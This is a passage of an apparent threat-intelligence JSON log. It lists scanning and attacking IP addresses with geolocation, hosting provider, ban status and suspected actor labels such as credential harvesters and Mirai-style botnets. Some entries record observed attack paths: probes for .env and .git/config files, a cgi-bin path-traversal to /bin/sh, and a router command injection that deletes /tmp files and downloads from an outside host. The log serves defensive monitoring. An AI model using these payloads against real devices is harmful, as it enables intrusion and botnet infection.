   "types": [
    "behaviour"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 76,
   "first_seen": "2026-10-04T03:37:00+02:00",
   "last_seen": "2026-10-04T03:37:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/credentials"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "213.209.159.84",
   "country": "Germany",
   "cc": "DE",
   "city": "Augsburg",
   "lat": 48.3459,
   "lon": 10.9161,
   "asn": 208137,
   "org": "Feo Prest SRL",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": 72,
   "first_seen": "2026-10-03T23:53:00+02:00",
   "last_seen": "2026-10-03T23:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "banned until Sun 23:53"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "195.178.110.28",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 71,
   "first_seen": "2026-10-03T21:37:00+02:00",
   "last_seen": "2026-10-03T21:37:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "ban expired 22:37"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "45.138.12.44",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 17,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-3"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "2 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.156.87.186",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 12,
   "first_seen": "2026-10-03T18:28:00+02:00",
   "last_seen": "2026-10-03T18:28:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "multi-night"
   ],
   "paths": [
    "/.git/config",
    "/wp-config.php"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "130.12.180.117",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 202412,
   "org": "Omegatech LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 11,
   "first_seen": "2026-10-04T04:23:00+02:00",
   "last_seen": "2026-10-04T04:23:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [
    "ban expired 05:23"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "193.32.204.199",
   "country": "Turkey",
   "cc": "TR",
   "city": "Istanbul",
   "lat": 41.0082,
   "lon": 28.9784,
   "asn": 153622,
   "org": "Madina IT",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 9,
   "first_seen": "2026-10-03T21:39:00+02:00",
   "last_seen": "2026-10-03T21:39:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "ban expired 22:39"
   ],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "43.163.90.125",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 132203,
   "org": "Shenzhen Tencent Computer Systems Company Limited",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 9,
   "first_seen": "2026-10-04T02:55:00+02:00",
   "last_seen": "2026-10-04T02:55:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [
    "ban expired 03:55"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.138.12.45",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": 6,
   "first_seen": "2026-10-03T21:48:00+02:00",
   "last_seen": "2026-10-03T21:48:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 03:48"
   ],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "2 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "38.248.19.54",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Cibogo",
   "lat": -6.3788,
   "lon": 106.121,
   "asn": 141983,
   "org": "PT Rajeg Media Telekomunikasi",
   "ptr": null,
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 6,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-1"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "139.28.219.70",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "London",
   "lat": 51.5128,
   "lon": -0.09184,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-03T19:41:00+02:00",
   "last_seen": "2026-10-03T23:16:00+02:00",
   "sensors": [
    "web-1",
    "web-2"
   ],
   "notes": [
    "ban expired 20:41"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "//wp-includes/wlwmanifest.xml"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "143.244.57.92",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 60068,
   "org": "Datacamp Limited",
   "ptr": "unn-143-244-57-92.datapacket.com",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-03T20:34:00+02:00",
   "last_seen": "2026-10-03T20:34:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 21:34"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "146.70.194.222",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9316,
   "lon": 2.35633,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-03T20:28:00+02:00",
   "last_seen": "2026-10-03T20:28:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 21:28"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.146.55.115",
   "country": "United States",
   "cc": "US",
   "city": "Memphis",
   "lat": 35.1495,
   "lon": -90.049,
   "asn": 62240,
   "org": "Clouvider Limited",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": 5,
   "first_seen": "2026-10-04T05:54:00+02:00",
   "last_seen": "2026-10-04T05:54:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [
    "banned until Sun 06:54"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "82.102.18.222",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9316,
   "lon": 2.35633,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": "host222.obamal.com",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 5,
   "first_seen": "2026-10-03T21:52:00+02:00",
   "last_seen": "2026-10-03T21:52:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 22:52"
   ],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "91.193.232.116",
   "country": "United States",
   "cc": "US",
   "city": "Memphis",
   "lat": 35.1495,
   "lon": -90.049,
   "asn": 62240,
   "org": "Clouvider Limited",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": 5,
   "first_seen": "2026-10-04T05:53:00+02:00",
   "last_seen": "2026-10-04T05:54:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [
    "banned until Sun 06:54"
   ],
   "tags": [
    "cluster:91.193.232.0/24"
   ],
   "paths": [
    "//wp-includes/ID3/license.txt"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "medium",
    "evidence": [
     "CMS, admin panel or PHP script probing",
     "2 addresses from 91.193.232.0/24 (AS62240) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.153.102.164",
   "country": "Ireland",
   "cc": "IE",
   "city": "Bagenalstown",
   "lat": 52.7007,
   "lon": -6.95706,
   "asn": 203020,
   "org": "HostRoyale Technologies Pvt Ltd",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": 3,
   "first_seen": "2026-10-03T18:32:00+02:00",
   "last_seen": "2026-10-04T00:33:00+02:00",
   "sensors": [
    "edge",
    "web-4"
   ],
   "notes": [
    "ban expired 01:33"
   ],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [
    "/.env"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "34.28.187.158",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "158.187.28.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 3,
   "first_seen": "2026-10-03T21:52:00+02:00",
   "last_seen": "2026-10-03T21:52:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "ban expired 22:52"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "91.92.242.37",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 202412,
   "org": "Omegatech LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 3,
   "first_seen": "2026-10-03T18:24:00+02:00",
   "last_seen": "2026-10-03T18:24:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "ban expired 19:24"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "multi-night"
   ],
   "paths": [
    "/.env"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "103.46.186.85",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 2,
   "first_seen": "2026-10-03T19:29:00+02:00",
   "last_seen": "2026-10-03T19:29:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "ban expired 20:29"
   ],
   "tags": [
    "cluster:103.46.186.0/24",
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders",
     "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "102.220.161.139",
   "country": "Slovenia",
   "cc": "SI",
   "city": "Ljubljana",
   "lat": 46.0569,
   "lon": 14.5058,
   "asn": 197769,
   "org": "VPS Dedicated LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T00:29:00+02:00",
   "last_seen": "2026-10-04T01:23:00+02:00",
   "sensors": [
    "edge",
    "web-1"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "hosting-provider",
    "cluster:102.220.161.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files",
     "2 addresses from 102.220.161.0/24 (AS197769) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "102.220.161.87",
   "country": "Slovenia",
   "cc": "SI",
   "city": "Ljubljana",
   "lat": 46.0569,
   "lon": 14.5058,
   "asn": 197769,
   "org": "VPS Dedicated LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T02:09:00+02:00",
   "last_seen": "2026-10-04T02:09:00+02:00",
   "sensors": [
    "edge",
    "web-2"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "hosting-provider",
    "cluster:102.220.161.0/24"
   ],
   "paths": [
    "/.git/config"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files",
     "2 addresses from 102.220.161.0/24 (AS197769) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "103.46.186.148",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T22:31:00+02:00",
   "last_seen": "2026-10-04T00:23:00+02:00",
   "sensors": [
    "edge",
    "web-4"
   ],
   "notes": [],
   "tags": [
    "cluster:103.46.186.0/24",
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders",
     "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "104.194.155.42",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 14956,
   "org": "RouterHosting LLC",
   "ptr": "42.155.194.104.static.cloudzy.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T00:08:00+02:00",
   "last_seen": "2026-10-04T05:43:00+02:00",
   "sensors": [
    "web-3",
    "web-4"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [
    "/.git/config"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "193.32.162.155",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T20:34:00+02:00",
   "last_seen": "2026-10-03T22:52:00+02:00",
   "sensors": [
    "edge",
    "web-1"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:193.32.162.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.45.237.97",
   "country": "United States",
   "cc": "US",
   "city": "Chicago",
   "lat": 41.8403,
   "lon": -87.6137,
   "asn": 400529,
   "org": "Infraly, LLC",
   "ptr": "hosted-by.infraly.co",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T02:40:00+02:00",
   "last_seen": "2026-10-04T03:46:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "103.189.178.93",
   "country": "India",
   "cc": "IN",
   "city": "Hyderabad (Srinivasa Nagar)",
   "lat": 17.4365,
   "lon": 78.4464,
   "asn": 149593,
   "org": "City Online Media Private Ltd",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T19:03:00+02:00",
   "last_seen": "2026-10-03T19:03:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "103.59.161.219",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Kediri",
   "lat": -7.81704,
   "lon": 112.014,
   "asn": 150493,
   "org": "PT Gunung Sedayu Sentosa",
   "ptr": "ip-103-59-161-219.indovm.com",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T03:40:00+02:00",
   "last_seen": "2026-10-04T03:40:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "103.74.21.89",
   "country": "Pakistan",
   "cc": "PK",
   "city": "Hub",
   "lat": 25.0256,
   "lon": 66.8853,
   "asn": 139879,
   "org": "Galaxy Broadband (pvt.) Ltd.",
   "ptr": "103-74-21-89.galaxy.net.pk",
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T01:46:00+02:00",
   "last_seen": "2026-10-04T01:46:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//172.168.171.61:\u2026"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "111.90.180.172",
   "country": "Cambodia",
   "cc": "KH",
   "city": "Phnom Penh",
   "lat": 11.5556,
   "lon": 104.933,
   "asn": 38235,
   "org": "Angkor Data Communication",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T00:11:00+02:00",
   "last_seen": "2026-10-04T00:11:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "134.199.157.29",
   "country": "Australia",
   "cc": "AU",
   "city": "Alexandria",
   "lat": -33.9088,
   "lon": 151.196,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T00:51:00+02:00",
   "last_seen": "2026-10-04T00:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "154.202.66.141",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 135377,
   "org": "UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T00:15:00+02:00",
   "last_seen": "2026-10-04T00:15:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "154.54.100.190",
   "country": "United States",
   "cc": "US",
   "city": "Beltsville",
   "lat": 39.0528,
   "lon": -76.9259,
   "asn": 6405,
   "org": "American Information Network",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-03T23:23:00+02:00",
   "last_seen": "2026-10-03T23:23:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "161.132.49.125",
   "country": "Peru",
   "cc": "PE",
   "city": "Llama",
   "lat": -6.51465,
   "lon": -79.1201,
   "asn": 3132,
   "org": "Red Cientifica Peruana",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T01:35:00+02:00",
   "last_seen": "2026-10-04T01:35:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "167.71.175.236",
   "country": "United States",
   "cc": "US",
   "city": "Clifton",
   "lat": 40.8302,
   "lon": -74.1299,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "ca7e79b6df.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T18:32:00+02:00",
   "last_seen": "2026-10-03T18:32:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS ca7e79b6df.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
